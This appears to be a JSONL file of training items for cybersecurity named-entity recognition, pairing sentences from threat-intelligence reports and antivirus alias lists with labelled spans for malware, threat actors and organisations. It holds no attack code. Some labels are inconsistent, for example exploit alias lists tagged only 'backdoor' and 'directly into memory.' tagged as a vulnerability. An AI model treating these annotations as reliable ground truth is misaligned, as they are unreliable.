Exploit.SWF.CVE-2011-0611.t Exploit.PDF.AC Exploit.PDF.AC Exploit.PDF.2177 HEUR_SWFEXP.W Exploit.CVE-2011-0611.g EXP/CVE-2011-0611.F Trojan[Exploit]/SWF.CVE-2011-0611.s Exploit:SWF/CVE-2011-0611.I Exploit.JS.Pdfka.dqw!c Exploit.JS.Pdfka.dqw Exploit.PDF.AC Exploit.PDF.AC Exploit.CVE2011-0611 Exploit.JS.Pdfka SWF/CVE20110611.fam!exploit Exploit_c.UAO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001913", "source": "cyner2_train"}} {"text": "Dyre is configured to defraud the customers of more than 1,000 banks and other companies worldwide.", "spans": {"MALWARE: Dyre": [[0, 4]], "ORGANIZATION: customers": [[34, 43]], "ORGANIZATION: banks": [[63, 68]], "ORGANIZATION: companies": [[79, 88]]}, "info": {"id": "cyner2_train_001916", "source": "cyner2_train"}} {"text": "We previously outlined a spam campaign that delivered FAKEGLOBE and CERBER ransomwares.", "spans": {"THREAT_ACTOR: spam campaign": [[25, 38]], "MALWARE: FAKEGLOBE": [[54, 63]], "MALWARE: CERBER ransomwares.": [[68, 87]]}, "info": {"id": "cyner2_train_001919", "source": "cyner2_train"}} {"text": "It is likely the vulnerability will 
be documented in full detail over the coming days.", "spans": {"VULNERABILITY: vulnerability": [[17, 30]]}, "info": {"id": "cyner2_train_001921", "source": "cyner2_train"}} {"text": "Back in February, the ThreatConnect team conducted an in-depth independent analysis of the Anthem breach, finding connections to amorphous Chinese APT activity.", "spans": {"ORGANIZATION: ThreatConnect team": [[22, 40]], "THREAT_ACTOR: amorphous Chinese APT activity.": [[129, 160]]}, "info": {"id": "cyner2_train_001923", "source": "cyner2_train"}} {"text": "Haima exactly does that, and more.", "spans": {"MALWARE: Haima": [[0, 5]]}, "info": {"id": "cyner2_train_001924", "source": "cyner2_train"}} {"text": "This study on an active campaign delves into the structure, goals, and requirements of the organizations involved, and provides an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures.", "spans": {"THREAT_ACTOR: an active campaign": [[14, 32]], "ORGANIZATION: organizations": [[91, 104]]}, "info": {"id": "cyner2_train_001926", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TrojanDownloader.Tearsp.AA2 Trojan/Downloader.Small.ahu Win32/Startpage.MF TROJ_SMALL_00000cc.TOMA Win.Trojan.Startpage-37 Trojan-Notifier.Win32.Small.a Trojan.Win32.Small.vkiie Trojan.Win32.A.Downloader.56724 TrojWare.Win32.TrojanDownloader.Small.AHU Trojan.MulDrop2.15120 Downloader.Small.Win32.40751 BehavesLike.Win32.Downloader.qt TrojanDownloader.Small.mmb W32.Trojan.Downloader.Small TR/StartPage.sc Trojan[Downloader]/Win32.Small Trojan:Win32/Symesta.B Downloader/Win32.Small.R5459 Trojan.Win32.Small.102210 Trj/Downloader.ABR Win32/TrojanDownloader.Small.AHU W32/Small.AHU!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001929", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Bandok.61952 Backdoor.Trojan Win32/Banbot.A Trojan.Bandook 
Backdoor.Win32.Bandok.h Backdoor.Win32.Bandok!IK Backdoor.Win32.Bandok.H Trojan.DownLoader.4293 Backdoor/Bandok.d Backdoor:Win32/Bandok.E Win-Trojan/Bandok.61952 Win32/Bandok.H Backdoor.Win32.Bandok.h Backdoor.Win32.Bandok W32/Bandok.H!tr.bdr BackDoor.Bandok.F Bck/Bandok.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001930", "source": "cyner2_train"}} {"text": "VENOM features similar mechanisms to the tools used during the Freenode intrusion in 2014.", "spans": {"MALWARE: VENOM": [[0, 5]], "MALWARE: tools": [[41, 46]], "THREAT_ACTOR: the Freenode intrusion": [[59, 81]]}, "info": {"id": "cyner2_train_001931", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9932 Trojan.MulDrop.2729 BehavesLike.Win32.Worm.dc TrojanDropper.Delf.cge TrojanBanker.Banker Trojan-Downloader.Win32.Delf W32/Banker.AFJ!tr Win32/Trojan.6cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001933", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SoaloaE.Trojan Trojan/W32.Buzus.239324 Trojan.VBCrypt.MF.75 Trojan/Injector.bggr Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SUAD-6922 Trojan.Win32.Buzus.osiq Trojan.Win32.Buzus.ebkods Win32.Trojan.Buzus.Lneb Trojan.PWS.Panda.4624 Trojan.Buzus.Win32.120917 BehavesLike.Win32.PWSZbot.dc Trojan/Buzus.bopu TR/Dropper.VB.ssypj W32/Injector.BJHT!tr Trojan/Win32.Buzus Trojan.Ransom.28 Trojan.Win32.Buzus.osiq Dropper/Win32.Necurs.R110132 Trojan.Crypt.NKN Trojan.Buzus!+gYkRxVVqlQ Trojan.Win32.Scarsi Trojan.Buzus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001935", "source": "cyner2_train"}} {"text": "These backdoors are described in this part of the article.", "spans": {"MALWARE: backdoors": [[6, 15]]}, "info": {"id": "cyner2_train_001937", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Regiskazi.a TROJ_SPNR.11AG15 
Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_SPNR.11AG15 Trojan.Win32.Regiskazi.dmdtgx Trojan.DownLoader12.16045 BehavesLike.Win32.Worm.hh Trojan.Heur2.JP.E61E47 Backdoor:Win32/Regiskazi.A Trojan/Win32.Downloader.C45921 Trj/CI.A Trojan.Regiskazi! Trojan.Win32.Regiskazi W32/Regiskazi.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001938", "source": "cyner2_train"}} {"text": "Currently this banker only has targets in Poland.", "spans": {"MALWARE: banker": [[15, 21]]}, "info": {"id": "cyner2_train_001940", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.CVE-2014-1761.C Exp.RTF.CVE-2012-0158.A Exploit-CVE2012-0158.n Win32.Exploit.CVE-2012-0158.i Trojan.ZHPA-6 Trojan.Mdropper TROJ_ARTIEF.UK Exploit.CVE-2014-1761.C Exploit.Win32.CVE-2012-0158.j Exploit.CVE-2014-1761.C Exploit.Rtf.Heuristic-rtf.dinbqn Exploit.S.CVE-2012-1761.619765 Exploit.MSWord.CVE-2014-1761.k!c Exploit.CVE-2014-1761.C Exploit.CVE-2014-1761.7 Exploit.CVE.MacroWord.257 TROJ_ARTIEF.UK Exploit-CVE2012-0158.n Exploit.CVE-2012-0158.c EXP/CVE-2014-1761.C.619765 Trojan[Exploit]/Office.CVE-2012-0158 Exploit.CVE-2014-1761.C Exploit.CVE-2014-1761.C Word.Exploit.Cve-2014-1761.Dwsn Trojan.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001941", "source": "cyner2_train"}} {"text": "Unit 42 for the past three months has been tracking a banking Trojan targeting victims in Brazil and the United States.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: banking Trojan": [[54, 68]]}, "info": {"id": "cyner2_train_001943", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TsagaaSAJ.Trojan Worm.AutoRun.FLD Trojan/AutoRun.VB.bfc Trojan.Heur.E08AD6 Win32.Worm.AutoRun.bz W32.SillyFDC Worm.Win32.AutoRun.HMT Win32.HLLW.Autoruner2.18557 Worm.Win32.AutoRun TR/Razy.xdwer HackTool:Win32/Virledi.A Trojan/Win32.Zbot.C401270 W32/VB.BFC!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001944", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CpqEasyBttn.Worm Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB!O Worm.Flewon.S349523 Win32.Worm.VB.ji Hacktool.Spammer Win32/Flewon.E WORM_VB.DHQ Win.Worm.Liamo-1 Dropped:Win32.Worm.VB.NRV Email-Worm.Win32.VB.cb Dropped:Win32.Worm.VB.NRV Trojan.Win32.VB.hpnv W32.W.AutoRun.l6mI Win32.Worm-email.Vb.Wqda Dropped:Win32.Worm.VB.NRV Dropped:Win32.Worm.VB.NRV Trojan.PWS.Asterie Worm.VB.Win32.303 WORM_VB.DHQ BehavesLike.Win32.VBObfus.ch TrojanClicker.Qihai.aq TR/Spy.Vwealer.KZ.33 Worm[Email]/Win32.VB Win32.Worm.VB.NRV I-Worm.Win32.VB.94208.E Email-Worm.Win32.VB.cb Worm:Win32/Flewon.A HEUR/Fakon.mwf Dropped:Win32.Worm.VB.NRV Trojan.VBRA.010583 Win32/VB.NGN I-Worm.VB.XYH Email-Worm.Win32.VB.cb W32/VB.CB@mm W32/MadCoffee.B.worm Win32/Trojan.Spy.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001950", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware08 Backdoor.Lecna.Q5 Trojan.SelfDelete Win32.Worm.ShipUp.h W32/Trojan-Gypikon-based.DM2!Ma Trojan.Win32.CFI.ddcdum TrojWare.Win32.ShipUp.AR Trojan.KillFiles.16512 BehavesLike.Win32.MultiPlug.dz W32/Trojan-Gypikon-based.DM2!Ma BDS/Taranis.4032 Backdoor:Win32/Lecna.Q!dha W32.W.AutoRun.m652 Trojan/Win32.Cossta.R120893 Win32/ShipUp.B Worm.Win32.ShipUp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001954", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Soul.ag Trojan.Heur.EEED6D Win32.Trojan.WisdomEyes.16070401.9500.9993 Win.Trojan.Crypted-3 Trojan.Win32.Pincav.bqfmw Trojan.Win32.Invader.blqtgb Win32.Trojan.Pincav.Dygr Trojan.Xispy Trojan.Xispy Trojan.Small.gr TR/Xispy.E.8 Troj.W32.Pincav.bqfmw!c Trojan.Win32.Pincav.bqfmw Trojan/Win32.IRCBot.C221390 Trojan.Soul!ykk6w7k8W/s Trj/Soul.I Win32/Trojan.Spy.620", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001955", "source": "cyner2_train"}} {"text": "It is by no 
means a new threat, but it is still actively used and developed and worthy of a breakdown in an effort to defend against it.", "spans": {}, "info": {"id": "cyner2_train_001956", "source": "cyner2_train"}} {"text": "In this article we will describe the process of extracting the final payload out of its cover.", "spans": {}, "info": {"id": "cyner2_train_001957", "source": "cyner2_train"}} {"text": "Since March 2016, the group has appeared to mostly focus on organizations in Hong Kong, sending malicious emails to targets as recently as August 4, and attempting to spread within compromised networks in order to steal information.", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: organizations": [[60, 73]], "SYSTEM: compromised networks": [[181, 201]]}, "info": {"id": "cyner2_train_001958", "source": "cyner2_train"}} {"text": "Linux Trojan is designed to set up a SOCKS5 proxy server on the infected computer on the basis of the freeware source codes of the Satanic Socks Server.", "spans": {"SYSTEM: Linux": [[0, 5]], "MALWARE: Trojan": [[6, 12]], "SYSTEM: SOCKS5 proxy server": [[37, 56]], "SYSTEM: infected computer": [[64, 81]], "SYSTEM: the Satanic Socks Server.": [[127, 152]]}, "info": {"id": "cyner2_train_001959", "source": "cyner2_train"}} {"text": "Since HackingTeam implants are built on-demand for each target, we wanted to take a closer look: to see how it works and what its functionality reveals about the possible interest of the attackers behind this latest Backdoor.", "spans": {}, "info": {"id": "cyner2_train_001961", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUA.Remadmin.S141625 Win32.Trojan.WisdomEyes.16070401.9500.9757 not-a-virus:RemoteAdmin.Win32.RMS.pr Trojan.Win32.RemoteAdmin.ekeqcb Trojan.MulDrop7.11923 BehavesLike.Win32.BadFile.th Trojan.Win32.RA W32/Trojan.BHMN-7604 W32.Rms.Pr TR/AD.RATBackdoor.fustx RiskWare[RemoteAdmin]/Win32.RMS.nd not-a-virus:RemoteAdmin.Win32.RMS.pr Backdoor.RMS Win32/RA-based.NFV 
Riskware.RemoteAdmin.DJ Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001962", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MiadheardLTS.Trojan Rootkit.Mask.A Trojan.Seedna Backdoor.Weevil.B BKDR_CARETO.A Rootkit.Mask.A Trojan.Win32.SGH.ay Rootkit.Mask.A Trojan.Win32.Heap.ctohpz Troj.W32.SGH.ay!c Win32.Trojan.Sgh.Pbpi Rootkit.Mask.A Backdoor:W32/Mask.A Trojan.SGH.Win32.2 BKDR_CARETO.A Backdoor.Mask W32/Backdoor.TAHG-4259 Trojan.Win32.c W32.Trojan.Careto TR/Heap.A.3 Trojan/Win32.SGH Rootkit.Mask.A Trojan.Win32.SGH.ay Trojan:WinNT/Seedna.A Trojan/Win32.Careto.R97384 Backdoor.Mask Trj/CI.A Win32/Appetite.C Trojan.SGH! Win32/Trojan.fa7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001963", "source": "cyner2_train"}} {"text": "A backdoor also known as: I-Worm.Naked.A Worm/W32.Naked.73728 Email-Worm.Win32!O W32.Naked I-Worm.Naked.A Worm.Naked.Win32.1 I-Worm.Naked.A W32/Nakedwife.A@mm W32.Naked@mm WORM_NAKED.A Win.Worm.Naked-1 I-Worm.Naked.A Email-Worm.Win32.Naked I-Worm.Naked.A Trojan.Win32.Naked.hbai I-Worm.Win32.Naked I-Worm.Naked.A Win32.HLLW.Naked WORM_NAKED.A Worm.Win32.Naked W32/Nakedwife.A@mm Worm:Win32/Naked.B@mm Email-Worm.Win32.Naked Worm.Naked Win32.Worm-email.Naked.Pdmp I-Worm.Naked.A Win32/Trojan.fc6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001964", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Flystudio.100458 Win32.Trojan.FlyStudio.oj Win.Worm.Bingd-1 Trojan.Win32.Vilsel.dfmi Trojan.Win32.Winlock.c Worm.Win32.Dropper.RA BackDoor.Pigeon.64233 Packed.Vemply.aph TR/Ransom.MBRLock.usvpx Trojan.Win32.Vilsel.dfmi Backdoor.Hupigon Win32.Outbreak W32/MBRlock.AQ!tr Trojan.Win32.Made.J", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001969", "source": "cyner2_train"}} {"text": "A backdoor targeting Linux also known as: TrojanDropper.Linux.Elknot.Y Backdoor.Linux.Mayday!c Linux/Elknot.A 
Backdoor.Linux.Mayday.g Trojan.Unix.DDoS.dncljq Linux.DDoS.7 Downloader.OpenConnection.JS.96932 ELF/Trojan.CNXM-8 Backdoor/Linux.hx LINUX/Elknot.iyani Linux/Mayday.1128800.E Backdoor.Linux.Mayday.g backdoor.linux.mayday.g Backdoor.Linux.Mayday", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001970", "source": "cyner2_train"}} {"text": "The group extensively uses long-running strategic web compromises SWCs, and relies on whitelists to deliver payloads to select victims.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "MALWARE: payloads": [[108, 116]]}, "info": {"id": "cyner2_train_001971", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Trojan.Zapchas.F IRC/Flood.ev IRC.Zapchast.AQ REG/Zapchast.A W32/Zapchast.CS IRC.Zapchast Backdoor.IRC.Zapchast Dropped:Trojan.Zapchas.F Application.Win32.RiskWare.mIRC.~BAAA Trojan.Zapchas.F IRC.Flood SPR/mIRC-1790464.A.5 REG_ZAPCHAST.BV Riskware.Client-IRC.Win32.mIRC!IK Trojan.IRC.ah Backdoor/IRC.IRC Dropped:Trojan.Zapchas.F REG/Zapchast.A Backdoor.IRC.Zapchast.a IRC/Cloner.AT not-a-virus:Client-IRC.Win32.mIRC REG/Zapchast.4D53!tr.bdr IRC/BackDoor.Flood Bck/MIRCBased.BI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001977", "source": "cyner2_train"}} {"text": "Throughout an attack campaign, actors will continue to develop their tools in an attempt to remain undetected and to carry out multiple attacks without having to completely retool.", "spans": {"THREAT_ACTOR: attack campaign, actors": [[14, 37]], "MALWARE: tools": [[69, 74]], "MALWARE: retool.": [[173, 180]]}, "info": {"id": "cyner2_train_001979", "source": "cyner2_train"}} {"text": "With North Korea becoming increasingly isolated from the world economy the likelihood that it will use its cyber capabilities for financial gain grows.", "spans": {"ORGANIZATION: world economy": [[57, 70]]}, "info": {"id": "cyner2_train_001980", "source": "cyner2_train"}} {"text": "This campaign seems to be old but still 
running although my infection wasn't being manually controlled at the time.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]]}, "info": {"id": "cyner2_train_001981", "source": "cyner2_train"}} {"text": "A backdoor also known as: Spam-Mailbot.m Trojan.Banker.Win32.7151 Backdoor.Trojan Win.Trojan.Banker-16870 Trojan.Packed.515 Trojan/Banker.xd Trojan.ZPACK!RjBLf3GsBZY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001983", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.a!bm3 Trojan/Downloader.Hacyayu.ahz Trojan.DL.Hacyayu!hNU/seEqyqU W32/Shiz.AK TROJ_SHIZ.SMP6 Trojan-Downloader.Win32.Hacyayu.alt Trojan.Packed.20771 TROJ_SHIZ.SMP6 Downloader.a!bm3 TrojanDownloader.Hacyayu.t Win32.TrojDownloader.Hacyayu.kcloud TrojanDownloader:Win32/Hacyayu.A Trojan.Win32.A.Downloader.39157 W32/Shiz.AK TrojanDownloader.Hacyayu.afi Trojan-Downloader.Win32.Hacyayu W32/Shiz.NCF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001984", "source": "cyner2_train"}} {"text": "Recently, Antiy CERT has captured a batch of active hoze mining Trojan horse samples through the wind-catching honeypot system.", "spans": {"ORGANIZATION: Antiy CERT": [[10, 20]], "MALWARE: Trojan": [[64, 70]], "SYSTEM: the wind-catching honeypot system.": [[93, 127]]}, "info": {"id": "cyner2_train_001986", "source": "cyner2_train"}} {"text": "The Trend Micro Forward Looking Threat Research team recently obtained samples of a new rootkit family from one of our trusted partners.", "spans": {"ORGANIZATION: Trend Micro": [[4, 15]], "MALWARE: rootkit family": [[88, 102]], "ORGANIZATION: trusted partners.": [[119, 136]]}, "info": {"id": "cyner2_train_001989", "source": "cyner2_train"}} {"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? 
id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently .", "spans": {"SYSTEM: Android": [[402, 409]], "ORGANIZATION: ASUS": [[542, 546]]}, "info": {"id": "cyner2_train_001990", "source": "cyner2_train"}} {"text": "The primary samples examined appear in the wild with filenames mimicking that of Adobe's Content Management System and offer a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.", "spans": {"SYSTEM: Adobe's Content Management System": [[81, 114]]}, "info": {"id": "cyner2_train_001994", "source": "cyner2_train"}} {"text": "On May 18, the authors of XData ransomware ran the massive attack against Ukrainian users supposedly leveraging the EternalBlue exploit as well as an ordinary spearphishing email delivery method.", "spans": {"THREAT_ACTOR: authors": [[15, 22]], "MALWARE: XData ransomware": [[26, 42]], "ORGANIZATION: Ukrainian users": [[74, 89]], "MALWARE: the EternalBlue exploit": [[112, 135]]}, "info": {"id": "cyner2_train_001998", "source": "cyner2_train"}} {"text": "Dubsmash is a mobile app to create short selfie videos dubbed with famous sounds.", "spans": {"SYSTEM: Dubsmash": [[0, 8]], "SYSTEM: mobile app": [[14, 24]]}, "info": {"id": "cyner2_train_001999", "source": "cyner2_train"}} {"text": 
"A backdoor also known as: Heur.Win32.VBKrypt.1!O Trojan/Dropper.VB.nxw Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Pws.BCWZ Win.Spyware.47661-2 Trojan-Dropper.Win32.Dorifel.atjn Win32.Trojan-dropper.Dorifel.Akos TrojWare.Win32.VB.fmmu Trojan.DownLoader9.62284 BehavesLike.Win32.Trojan.gh Trojan-Dropper.Win32.Duon W32/PWS.IDDR-8868 Trojan.Heur.E019B0 Trojan-Dropper.Win32.Dorifel.atjn Malware-Dropper.VB.WLCrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002000", "source": "cyner2_train"}} {"text": "A backdoor also known as: Script.SWF.Cxx+.C173 SWF.Kit.Angler.G Exploit-SWF.x Bloodhound.Flash.31 SWF/Exploit.CVE-2015-3090.A SWF_EKSPLOYT.ED Swf.Packer.Angle-1 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Exploit.SWF.438 SWF_EKSPLOYT.ED BehavesLike.Flash.Exploit.kb EXP/CVE-2015-3090.AU Exploit:SWF/Netis.B Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 SWF.Win32.Script.800529 Exploit.SWF SWF/ExKit.AQ!exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002004", "source": "cyner2_train"}} {"text": "This article will discuss the malware delivered from that exploit kit.", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: exploit kit.": [[58, 70]]}, "info": {"id": "cyner2_train_002005", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.VBNA.bvts Trojan.Win32.VB.exmtrp Win32.Worm.Vbna.Wqdi Trojan.MSILPerseus.D2341B Worm.Win32.VBNA.bvts Worm:Win32/Esfury.T TScope.Trojan.MSIL Trj/CI.A Win32/Trojan.Dropper.6ac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002007", "source": "cyner2_train"}} {"text": "An old banking Trojan that has been operating in Europe on a low level has spiked in activity after migrating to Japan.", "spans": {"MALWARE: banking Trojan": [[7, 21]]}, "info": {"id": "cyner2_train_002008", "source": "cyner2_train"}} {"text": "This article revolves around the macro tricks it uses to stall analysts, and new commands that it 
utilizes to better persist on infected devices.", "spans": {"MALWARE: macro": [[33, 38]], "SYSTEM: infected devices.": [[128, 145]]}, "info": {"id": "cyner2_train_002009", "source": "cyner2_train"}} {"text": "Recently we were able to observe these actors making modifications to their ClaySlide delivery documents in an attempt to evade antivirus detection.", "spans": {}, "info": {"id": "cyner2_train_002010", "source": "cyner2_train"}} {"text": "Within this blog post, a payload containing a function named 'forkmeiamfamous' was mentioned.", "spans": {"MALWARE: payload": [[25, 32]]}, "info": {"id": "cyner2_train_002013", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Lewor.B@mm Win32.Lewor.B@mm Worm.Lewor.Win32.28 W32/Lewor.b Win32.Lewor.E2C45E Win32.Trojan.WisdomEyes.16070401.9500.9944 W32.HLLW.Leox Win32.Lewor.B@mm Win32.Lewor.B@mm Trojan.Win32.Lewor.gptp W32.W.Lewor.b!c Win32.Lewor.B@mm Win32.Lewor.B@mm Trojan.PWS.Legmir BehavesLike.Win32.Pykse.kc I-Worm/Lewor.b Worm:Win32/Lewor.B@mm W32/Lewor.AP.worm Worm.Lewor!B42TpjAm9iw Trojan-Banker.Win32.Banker W32/GamePSW.B@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002014", "source": "cyner2_train"}} {"text": "The exploit has since been added into the Angler Exploit Kit and integrated into Metasploit.", "spans": {"MALWARE: The exploit": [[0, 11]], "MALWARE: Angler Exploit Kit": [[42, 60]], "SYSTEM: Metasploit.": [[81, 92]]}, "info": {"id": "cyner2_train_002016", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Kagayab Trojan.Razy.D18A59 Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.Dropper.mm W32/Trojan.GGCJ-3154 TrojanDownloader:Win32/Kagayab.A Trj/GdSda.A Win32/Trojan.a98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002017", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.12BD Trojanspy.Babar Trojan.Badbar Win32.Trojan.Babar.A Trojan-Spy.Win32.Babar.a 
Trojan.Win32.Babar.dqhfcx Troj.Spy.W32!c Trojan.Babar.1 Trojan.Babar.Win32.3 BehavesLike.Win32.Trojan.fc TrojanSpy.Babar.c TR/AD.Babar.royis Trojan.Zusy.D42EE8 PWS:Win32/Babar.A!dha Trj/GdSda.A Win32.Trojan-spy.Babar.Dwsy Win32/Trojan.Spy.8fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002018", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DaltetoD.Trojan Trojan/Fbphotofake.b Win32.Trojan.WisdomEyes.16070401.9500.9992 HV_CARDPAY_CA222928.TOMC Win.Trojan.Ag-4254306-1 Trojan-Dropper.Win32.FrauDrop.cth Trojan.Win32.Drop.mssht TrojWare.Win32.Downloader.Fraudload.AB Trojan.AVKill.14860 Dropper.FrauDrop.Win32.3001 BehavesLike.Win32.PWSZbot.fc Trojan.Win32.Fifesock W32.Malware.Downloader Trojan[Dropper]/Win32.FrauDrop Trojan-Dropper.Win32.FrauDrop.cth Trojan/Win32.CardPay.R21713 TrojanDropper.FrauDrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002019", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Ddosaz.elmrbx TrojWare.Win32.ServStart.DQ Trojan.DownLoader23.31518 BehavesLike.Win32.Backdoor.kh Trojan.Graftor.D53379 Trojan:Win32/Ddosaz.A BScope.TrojanDDoS.Macri Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002020", "source": "cyner2_train"}} {"text": "Palo Alto Networks has observed a recent high-threat spam campaign that is serving malicious macro documents used to execute PowerShell scripts which injects malware similar to the Ursnif family directly into memory.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: high-threat": [[41, 52]], "THREAT_ACTOR: spam campaign": [[53, 66]], "MALWARE: malicious macro": [[83, 98]], "MALWARE: malware": [[158, 165]], "MALWARE: Ursnif family": [[181, 194]], "VULNERABILITY: directly into memory.": [[195, 216]]}, "info": {"id": "cyner2_train_002022", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: W32.WintaskLTE.Trojan Win32/Bancos.ABHY Trojan.Phisher.G Trojan.Dynamer.D9 Trojan.Phisher.G Troj.PSW.PHP.AccPhish.lstI Win32.Trojan.WisdomEyes.16070401.9500.9987 PHP/PSW.Phishack.AT Trojan.Phisher.G Trojan.Phisher.G Trojan.PWS.Stealer.895 BehavesLike.Win32.PWSMmorpg.vc Trojan/PSW.VKont.pq TR/Spy.PHP.psb Trojan[PSW]/PHP.AccPhish.rr Trojan.Phisher.G Trojan:Win32/Phishacco.A Trojan.Phisher.G Trj/CI.A Php.Trojan-qqpass.Qqrob.Sxxq Trojan.PHP.PSW W32/AccPhish.EU!tr.pws Win32/Trojan.d71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002023", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TenoesaASN.Trojan Worm/W32.WBNA.102405 Win32.Trojan.WisdomEyes.16070401.9500.9978 Worm.Win32.WBNA.oaw Downloader.VB.Win32.98815 BehavesLike.Win32.Downloader.cm Win32.Sality TR/AD.Maywidmzi.brqly TrojanDownloader:Win32/Maywidmzi.A Worm.Win32.WBNA.oaw Worm/Win32.WBNA.C1716518 Worm.WBNA Trj/GdSda.A Win32/TrojanDownloader.VB.QXP Win32.Worm.Wbna.Ects Trojan.DL.VB!tTzkeI6oupQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002024", "source": "cyner2_train"}} {"text": "Login details are sent to attackers using an HTTP GET connection ONLY once.", "spans": {"THREAT_ACTOR: attackers": [[26, 35]]}, "info": {"id": "cyner2_train_002025", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Lodap Trojan/Exploit.CVE-2010-2568.f TROJ_STUXNET.DX W32.Stuxnet TROJ_STUXNET.DX Win.Trojan.Stuxnet-36 Exploit.Win32.CVE-2010-2568.b Exploit.Win32.CVE20102568f.bkuia Exploit.W32.CVE-2010-2568.f!c Win32.Exploit.Cve-2010-2568.Wopr Exploit.CVE.Win32.14 Trojan.Win32.Exploit Trojan[Exploit]/Win32.CVE-2010-2568 Exploit.Win32.CVE-2010-2568.b Exploit.Stuxnet Trj/ChymineLNK.A Win32/Exploit.CVE-2010-2568 Win32/Trojan.Exploit.406", "spans": {"MALWARE: backdoor": [[2, 10]]}, 